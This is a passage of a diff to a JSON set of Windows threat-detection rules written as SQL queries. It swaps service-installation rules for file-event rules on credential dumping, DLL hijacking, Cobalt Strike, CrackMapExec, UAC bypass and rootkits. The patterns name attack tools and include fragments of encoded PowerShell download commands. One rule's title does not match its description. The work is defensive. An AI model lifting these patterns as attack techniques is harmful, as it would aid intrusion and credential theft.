Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + 
"attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'DNS Server' AND EventID IN ('150', '770', '771'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\All.cab' ESCAPE '\\' OR TargetFilename LIKE '%.ntds.cleartext' ESCAPE '\\')" ], - "filename": "win_dns_server_susp_server_level_plugin_dll.yml" + "filename": "file_event_win_ntds_exfil_tools.yml" }, { - "title": "Suspicious Service Installation Script", - "id": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", - "status": "experimental", - "description": "Detects suspicious service installation scripts", - "author": "pH-T (Nextron Systems)", + "title": "Powerup Write Hijack DLL", + "id": "602a1f13-c640-4d73-b053-be9a2fa58b96", + "status": "test", + "description": "Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.\nIn it's default mode, it builds a self deleting .bat file which executes malicious command.\nThe detection rule relies on creation of the malicious bat file (debug.bat by default).\n", + "author": "Subhash Popuri (@pbssubhash)", "tags": [ "attack.persistence", "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1574.001" ], "falsepositives": [ - "Unknown" + "Any powershell script that creates bat files" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '% /c %' ESCAPE '\\' OR ImagePath LIKE '% /r %' ESCAPE '\\' OR ImagePath LIKE '% /k %' ESCAPE '\\') AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\' OR ImagePath LIKE '%wscript%' ESCAPE '\\' OR ImagePath LIKE '%cscript%' ESCAPE '\\' OR ImagePath LIKE '%mshta%' ESCAPE '\\' OR ImagePath LIKE '%rundll32%' ESCAPE '\\' OR ImagePath LIKE '%regsvr32%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE 
'%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%.bat' ESCAPE '\\')" ], - "filename": "win_system_susp_service_installation_script.yml" + "filename": "file_event_win_hktl_powerup_dllhijacking.yml" }, { - "title": "Local Privilege Escalation Indicator TabTip", - "id": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", + "title": "RDP File Creation From Suspicious Application", + "id": "fccfb43e-09a7-4bd2-8b37-a5a7df33386d", "status": "experimental", - "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Rclone config file being created", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '10001' AND param1 LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ink\\\\TabTip.exe' ESCAPE '\\' AND param2 = '2147943140' AND param3 = '{054AAE20-4BEA-4347-8A35-64A533254A9D}')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chromium.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Vivaldi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Whale.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Outlook.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\RuntimeBroker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Thunderbird.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Discord.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Keybase.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msteams.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Slack.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\teams.exe' ESCAPE '\\') AND TargetFilename LIKE '%.rdp%' ESCAPE '\\')" ], - "filename": "win_system_lpe_indicators_tabtip.yml" + "filename": "file_event_win_rdp_file_susp_creation.yml" }, { - "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", - "id": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", - "status": "experimental", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "InstallerFileTakeOver LPE CVE-2021-41379 File Create Event", + "id": "3be82d5d-09fe-4d6a-a275-0d40d234d324", + "status": "test", + "description": "Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.t1068" ], "falsepositives": [ - "Highly unlikely" + "Unknown", + "Possibly some Microsoft Edge upgrades" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%cmd.exe%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath 
LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%.dll,a%' ESCAPE '\\' AND ImagePath LIKE '%/p:%' ESCAPE '\\') OR ImagePath LIKE '\\\\\\\\127.0.0.1\\\\ADMIN$\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\')" ], - "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" + "filename": "file_event_win_cve_2021_41379_msi_lpe.yml" }, { - "title": "KrbRelayUp Service Installation", - "id": "e97d9903-53b2-41fc-8cb9-889ed4093e80", - "status": "experimental", - "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", - "author": "Sittikorn S, Tim Shelton", + "title": "Moriya Rootkit", + "id": "a1507d71-0b60-44f6-b17c-bf53220fdd88", + "status": "test", + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "author": "Bhabesh Raj", "tags": [ + "attack.persistence", "attack.privilege_escalation", - "attack.t1543" + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND ServiceName = 'KrbSCM')" + "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\drivers\\\\MoriyaStreamWatchmen.sys' ESCAPE '\\'" ], - "filename": "win_system_krbrelayup_service_installation.yml" + "filename": "file_event_win_moriya_rootkit.yml" }, { - "title": "NTFS Vulnerability Exploitation", - "id": "f14719ce-d3ab-4e25-9ce6-2899092260b0", - "status": "test", - "description": "This the exploitation of a NTFS vulnerability as reported without 
many details via Twitter", + "title": "CrackMapExec File Creation Patterns", + "id": "9433ff9c-5d3f-4269-99f8-95fc826ea489", + "status": "experimental", + "description": "Detects suspicious file creation patterns found in logs when CrackMapExec is used", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1499.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Ntfs' AND EventID = '55' AND Origin = 'File System Driver' AND Description LIKE '%contains a corrupted file record%' ESCAPE '\\' AND Description LIKE '%The name of the file is \"\\\\\"%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\rundll32.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (TargetFilename LIKE '%.rtf' ESCAPE '\\' OR TargetFilename LIKE '%.otf' ESCAPE '\\' OR TargetFilename LIKE '%.odt' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.pdf' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.wpd' ESCAPE '\\' OR TargetFilename LIKE '%.icns' ESCAPE '\\' OR TargetFilename LIKE '%.db' ESCAPE '\\' OR TargetFilename LIKE '%.ini' ESCAPE '\\' OR TargetFilename LIKE '%.tex' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.csv' ESCAPE '\\' OR TargetFilename LIKE '%.fon' ESCAPE '\\' OR TargetFilename LIKE '%.tar' ESCAPE '\\' OR TargetFilename LIKE '%.ttf' ESCAPE '\\' OR TargetFilename LIKE '%.xml' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.jpg' ESCAPE '\\' OR TargetFilename LIKE '%.drv' ESCAPE '\\' OR 
TargetFilename LIKE '%.cur' ESCAPE '\\' OR TargetFilename LIKE '%.tmp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\procdump.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_system_ntfs_vuln_exploit.yml" + "filename": "file_event_win_crackmapexec_patterns.yml" }, { - "title": "CobaltStrike Service Installations - System", - "id": "5a105d34-05fc-401e-8553-272b45c1522d", + "title": "Files With System Process Name In Unsuspected Locations", + "id": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", + "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ - "Unknown" + "System processes copied outside their default folders for testing purposes", + "Third party software naming their software with the same names as the processes mentioned here" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%ADMIN$%' ESCAPE '\\' AND ImagePath LIKE '%.exe%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%start%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\') OR ImagePath LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR ImagePath LIKE 
'%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ImagePath LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ImagePath LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AtBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\backgroundTaskHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\conhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\csrss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dasHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dfrgui.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dwm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventcreate.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\explorer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fontdrvhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicli.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicpl.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\logman.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msinfo32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\nbtstat.exe' ESCAPE '\\' 
OR TargetFilename LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powershell.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regini.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthService.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\services.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ShellAppRuntime.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sihost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\svchost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TiWorker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFaultSecure.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wininit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinRTNetMUAHostServer.exe' ESCAPE 
'\\' OR TargetFilename LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wslhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSReset.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WUDFHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WWAHost.exe' ESCAPE '\\') AND NOT (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR TargetFilename LIKE '\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\Windows\\\\System32\\\\dism.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\wbengine.exe' ESCAPE '\\') OR (NewProcessName LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:Program Files\\\\WindowsApps\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\SecurityHealth\\\\%' 
ESCAPE '\\' AND TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\SecurityHealthSetup.exe' ESCAPE '\\')))" ], - "filename": "win_system_cobaltstrike_service_installs.yml" + "filename": "file_event_win_creation_system_file.yml" }, { - "title": "RTCore Suspicious Service Installation", - "id": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", - "status": "experimental", - "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using .NET Code Profiler on MMC", + "id": "93a19907-d4f9-4deb-9f91-aac4692776a6", + "status": "test", + "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'RTCore64')" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pe386.dll' ESCAPE '\\')" ], - "filename": "win_system_susp_rtcore64_service_install.yml" + "filename": "file_event_win_uac_bypass_dotnet_profiler.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - System", - "id": "f7385ee2-0e0c-11eb-adc1-0242ac120002", + "title": "Potential Privilege Escalation Attempt Via .Exe.Local Technique", + "id": "07a99744-56ac-40d2-97b7-2095967b0e03", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects potential privilege escalation attempt via the creation of the 
\"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%clipboard]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wermgr.exe.local%' ESCAPE '\\') AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_clip_services.yml" + "filename": "file_event_win_system32_local_folder_privilege_escalation.yml" }, { - "title": "Suspicious Service Installation", - "id": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", + "title": "Potential Startup Shortcut Persistence Via PowerShell.EXE", + "id": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", "status": "experimental", - "description": "Detects suspicious service installation commands", - "author": "pH-T (Nextron Systems)", + "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 
2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", + "author": "Christopher Peacock '@securepeacock', SCYTHE", "tags": [ "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '% -w hidden %' ESCAPE '\\' OR ImagePath LIKE '% -nop %' ESCAPE '\\' OR ImagePath LIKE '% -sta %' ESCAPE '\\' OR ImagePath LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\.\\\\pipe%' ESCAPE '\\' OR ImagePath LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR ImagePath LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%.downloadstring(%' ESCAPE '\\' OR ImagePath LIKE '%.downloadfile(%' ESCAPE '\\') OR (ImagePath LIKE '% -e%' ESCAPE '\\' AND (ImagePath LIKE '% JAB%' ESCAPE '\\' OR ImagePath LIKE '% SUVYI%' ESCAPE '\\' OR ImagePath LIKE '% SQBFAFgA%' ESCAPE '\\' OR ImagePath LIKE '% aWV4I%' ESCAPE '\\' OR ImagePath LIKE '% IAB%' ESCAPE '\\' OR ImagePath LIKE '% PAA%' ESCAPE '\\' OR ImagePath LIKE '% aQBlAHgA%' ESCAPE '\\')))) AND NOT ((ImagePath LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\thor10-remote\\\\thor64.exe%' ESCAPE '\\') OR (ImagePath LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition 
Updates\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\start menu\\\\programs\\\\startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk' ESCAPE '\\')" ], - "filename": "win_system_susp_service_installation.yml" + "filename": "file_event_win_powershell_startup_shortcuts.yml" }, { - "title": "Important Windows Eventlog Cleared", - "id": "100ef69e-3327-481c-8e5c-6d80d9507556", + "title": "Unusual File Modification by dns.exe", + "id": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", "status": "experimental", - "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog' AND Channel IN ('System', 'Security', 'Application'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" ], - "filename": "win_system_susp_eventlog_cleared.yml" + "filename": "file_change_win_unusual_modification_by_dns_exe.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - System", - "id": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", + "title": 
"File Creation Date Changed to Another Year", + "id": "558eebe5-f2ba-4104-b339-36f7902bcc1a", "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.t1070.006", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Changes made to or by the local NTP service" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND (ImagePath REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ImagePath REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ImagePath REGEXP 